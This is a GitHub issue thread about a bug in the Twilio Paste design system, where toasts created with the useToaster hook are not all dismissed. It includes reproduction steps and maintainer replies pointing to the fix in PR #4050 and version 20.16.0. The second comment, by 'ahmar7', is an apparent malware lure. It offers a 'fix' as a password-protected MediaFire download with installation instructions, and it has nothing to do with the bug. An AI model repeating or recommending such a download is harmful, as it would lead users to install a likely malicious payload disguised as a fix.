### ISSUE TITLE
Toasters not dismissed

### ISSUE THREAD

**Issue by kanadipa** [twilio-labs/paste#4048]
### Description

When multiple Toasters come up, only the first one gets dismissed when using useToaster. The rest stay on the screen. 

### Link to Reproduction

https://paste.twilio.design/components/toast#usetoaster-hook

### Steps to reproduce

1. Go to '.Dismiss After'
2. Add time 1000
3. Click on 'Add Toast' twice
4. See 2 Toasters, only one getting dismissed

### Paste Core Version

20.13

### Operating System

- [ ] macOS
- [ ] Windows
- [ ] Linux

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by serifluous** [comment]
Hey @kanadipa  ! This fix will be merged in with this PR: #4050

**Comment by krisantrobus** [comment]
Hi @kanadipa, this fix has now been released in our latest version of @twilio-paste/core 20.16.0
